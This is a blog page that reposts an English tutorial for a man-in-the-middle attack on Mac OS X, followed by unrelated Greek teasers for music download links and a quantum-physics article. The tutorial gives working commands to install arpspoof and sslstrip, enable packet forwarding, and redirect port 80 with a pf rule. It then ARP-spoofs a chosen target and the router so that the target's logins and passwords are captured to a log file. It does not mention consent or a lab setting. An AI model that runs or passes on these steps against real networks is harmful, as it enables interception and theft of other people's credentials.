Μετάβαση στο κύριο περιεχόμενο

SSL Strip on Mac OS X

First, we need to install the tools required, which are arpspoof and sslstrip. arpspoof comes with the dsniff suite and you can try to compile dsniff manually but I used macports to do it. Here are the steps I took :-

Installing arpspoof




    Make sure Xcode is installed. You can do this from the App Store.
  1. Make sure that Command Line Tools are installed.


  2. Download the installation package from macports here.
  3. Install it by opening and following through the installation. Straightforward.
  4. Open up a Terminal window.
  5. Do an update, by typing sudo port -d selfupdate
  6. Install dsniff, by typing sudo port install dsniff. The command should take a while but fail eventually. (may have changed, if it doesn't fail, skip to step 10.)
  7. One of the dependancies for dsniff is libnids. And one of the dependancies of libnids is libnet. It turns out that the default variant is libnids +libnet11, which will not work. So we need to uninstall libnids, and install the other variant. Do this with 

    • sudo port uninstall libnids
    • sudo port install libnids +libnet

  8. Try sudo port install dsniff again. It should work this time.
  9. arpspoof should have been installed. You can test it out from the Terminal window by typing arpspoof -h.

Installing sslstrip

  1. We need some python packages that are needed by sslstrip. Install them by typing this in a Terminal window

    • sudo port install python27 (optional?)
    • sudo port install py27-openssl
    • sudo port install py27-twisted-web2
    • sudo port install python_select (optional?)

  2. Download sslstrip. I used the 0.9-2 version.
  3. Decompress the archive.
  4. sslstrip should now be working from the decompressed archive. You can test it out from the Terminal window by typing python sslstrip.py -h from the sslstrip-0.9.2 folder.

Getting ready to run

  1. Run the following commands. They allow you to use your mac to forward any incoming ip packets.

    • sudo sysctl -w net.inet.ip.forwarding=1
    • sudo sysctl -w net.inet.ip.fw.enable=1
    • sudo sysctl -w net.inet.ip.fw.verbose=1 (optional?)

  2. At this point, you can choose to modify sslstripI preferred a cleaner output so I added in a try-catch at the following lines in the ServerConnection.py file.

  3.             try:
                    HTTPClient.handleResponseEnd(self)
                except:
                    pass

    I also made some other changes. In particular, I made the log level to be debug mode, so I can see them from the log file generated, if I need to. Important data I made to print out from the console, such as urls, logins, and passwords.
  4. We need to do port redirection of traffic. The usual packet firewall ipfw did not work - it was slated to be deprecated in Mountain Lion. Instead I used pf (for Packet Filter) instead. Make a backup of the file /etc/pf.conf, and save it somewhere, e.g. pf_mod.conf.
  5. Specifically, we want to redirect all http traffic to our localhost at a specified port, say 8080. Insert the following line in the beginning of the file. This line says to redirect all incoming traffic from the interface en1, with any source and any destination address, but port 80 to localhost (127.0.0.1) on port 8080. Assuming en1 is the interface name you are using.

  6. rdr pass on en1 proto tcp from any to any port 80 -> 127.0.0.1 port 8080

  7. Run  sudo pfctl -e -f pf_mod.conf. This command enables the packet filter and to take its rules from the pf_mod.conf file.
    (To disable after you're done, simply do the same command with the backup file that you copied in step 3. You may also want to type
     sudo pfctl -d to disable the packet filter, if it was disabled in the first place.)
  8. Start sslstrip by typing python sslstrip.py -p -k -l 8080 -w ./sslstrip.log.  Here, we are specifying that we only want to see secure post data, kill sessions, to listen at port 8080, and all output to be written to the file sslstrip.log. If run sucessfully, it should say that it is running.
  9. Choose a target IP address, say 192.168.1.20. You can find this out using nmap. Also, find out now where your router is, say 192.168.1.1. You can find this out using netstat -rn, and looking at the default gateway. Now type in the following command in a new Terminal window.

  10. arpspoof -i en1 -t 192.168.1.20 192.168.1.1

  11. You should be getting your credentials in your sslstrip.log file, when the target logins to a secure website.
Credits to Moxie for sslstrip and Dug Song for arpspoof.

via: techjots.blogspot.com

Σχόλια

Δημοφιλείς αναρτήσεις από αυτό το ιστολόγιο

Greek balland's free music

Tο foulscode.com κάνει διαμερισμό συνδέσμων.
Κάντε ένα μια κοινοποίηση για να μας ενθαρρύνεται να συνεχίσουμε!

01 ΔΕΚΑ ΤΣΙΓΑΡΑ
https://app.box.com/s/xahidkdbv6rxfgjrnw2xfqefbgq77a6i

01 ΜΑΚΡΙΑ ΑΠΟ ΕΜΑΣ
https://app.box.com/s/vr3sqgdj2vqprxdxjqqvgq215l69lk3j

01 ΤΑ ΣΑΒΒΑΤΑ
https://app.box.com/s/bplnwl36g12cssipb59i744iryfva9j8

01 Ena Fili
https://app.box.com/s/tlr6349tuxhc0fqsq6cez26jvxry5k6h

02. ΑΠΑΓΟΡΕΥΕΤΑΙ
https://app.box.com/s/de4bpw0kg304i1luz71j19p2mzemnidt

06. Φίλε μη ρωτάς
https://app.box.com/s/qwyl99o8ztbffmnj6tmcj4gn8ef0ghxs

09 asthn na leei - basilhs karras
https://app.box.com/s/0ijzqzl6ebj0wh3j79d7oruljqzxpocm

09. ΤΕΛΕΙΩΜΕΝΕΣ ΚΑΤΑΣΤΑΣΕΙΣ
https://app.box.com/s/92lmnkx8c8wjygh8rpqwjjokj93eq3ki

Γιώργος Μαζωνάκης -Παλιόπαιδο θα γίνω
https://app.box.com/s/kcr8k7zs5jzh1ytk19kg58hbcc8oqybm


ΓΛΥΚΕΡΙΑ - ΟΤΙ ΚΑΙ ΝΑ ΓΙΝΕΙ ΘΥΜΗΣΟΥ
https://app.box.com/s/3wx51zv6trciw76tmd7el2451hi0pzys


Δημήτρης Μητροπάνος-Alimono
https://app.box.com/s/3ae5na1652oz8iwpn8si14coibpatgv6

Νότης Σφακιανάκης - Παράλληλα (Dj…

Ασφαλή δεδομένα με …κβαντική ακρίβεια? Ένα άκρως ενδιαφέρον πείραμα

Κβαντική μηχανική
Στο πανεπιστήμιο Ludwig-Maximilian του Μονάχου, το υπόγειο του κτιρίου της Φυσικής συνδέεται με το κτίριο των Οικονομικών με οπτικές ίνες μήκους περίπου 1 χιλιομέτρου. Ένα φωτόνιο χρειάζεται μόλις τρία εκατομμυριοστά του δευτερολέπτου – και ένα φυσικός, περίπου πέντε λεπτά – για να ταξιδέψει από το ένα κτίριο στο άλλο. Από τον Νοέμβριο του 2015, και για επτά περίπου μήνες, μεμονωμένα φωτόνια μεταδίδονταν μεταξύ των δυο κτιρίων, στα πλαίσια ενός πειράματος κβαντικής φυσικής που θα μπορούσε κάποια μέρα να βοηθήσει στη διασφάλιση των δεδομένων σας.

Ο άμεσος στόχος των ερευνητών ήταν να ερμηνεύσουν μια πολλά υποσχόμενη -όσο και αμφιλεγόμενη- θεώρηση της κβαντικής φυσικής: εάν υπάρχει το φαινόμενο της κβαντικής διεμπλοκής (quantum entanglement). Η κβαντική διεμπλοκή (ή κβαντικός εναγκαλισμός), περιγράφει ένα περίεργο σενάριο κατά το οποίο η μοίρα δύο κβαντικών σωματιδίων – όπως ένα ζευγάρι ατόμων, φωτονίων, ή ιόντων – είναι απόλυτα συνυφασμένη: Ακόμη και εάν χωρίσετε αυτά…

Greek balland's2014 free

Και έτσι θα ξεκινήσουμε με πιο πολλά download με διαφορα αρχεία και όχι μονο μουσική όπως εδώ! Τα αρχεία μουσικής δεν φιλοξενούνται στον server του μπλόγκερ! 
Απλά το foulscode.com κάνει διαμερισμό συνδέσμων.
Κάντε ένα μια κοινοποίηση για να μας ενθαρρύνεται να συνεχίσουμε!

Μελίνα Ασλανίδου-Το κρύο και η μοναξιά
https://app.box.com/s/9ge8kuvhxgqf0tgxy46e7ga78a0v5hw5

Παντελής Παντελίδης - Είχα Κάποτε Μια Αγάπη (Dj Froody Remix)
https://app.box.com/s/g9xo58c5rjjdt1morzhonfy0jye0wzvw

Παντελής Παντελίδης - Κι Εγώ Σ' Αγαπώ (George Tsokas & Panos Haritidis Private Intro)
https://app.box.com/s/7crto4eajbmqyec5aazq0414vc1m0rrf

Παντελής Παντελίδης-03. -Θεός Μου Είσαi
https://app.box.com/s/bsvwlxnln0q7tq471jrzbbcui0rbbnll

Παντελής Παντελίδης-Όνειρο ζω
https://app.box.com/s/k9d06nndjngqccnw1cgsjje5zm7iufbe

ΠΙΝΩ ΣΤΗΝ ΥΓΕΙΑ ΣΟΥ '' ΗΛΙΑΣ ΒΡΕΤΤΟΣ 2014
https://app.box.com/s/uba6to5of9mhzxmfvx6o7tom7ccg5xkd

ΦΑΝΗ ΔΡΑΚΟΠΟΥΛΟΥ - ΕΚΚΡΕΜΟΤΗΤΕΣ
https://app.box.com/s/ecc1qel2rdkgccjgr9u9q…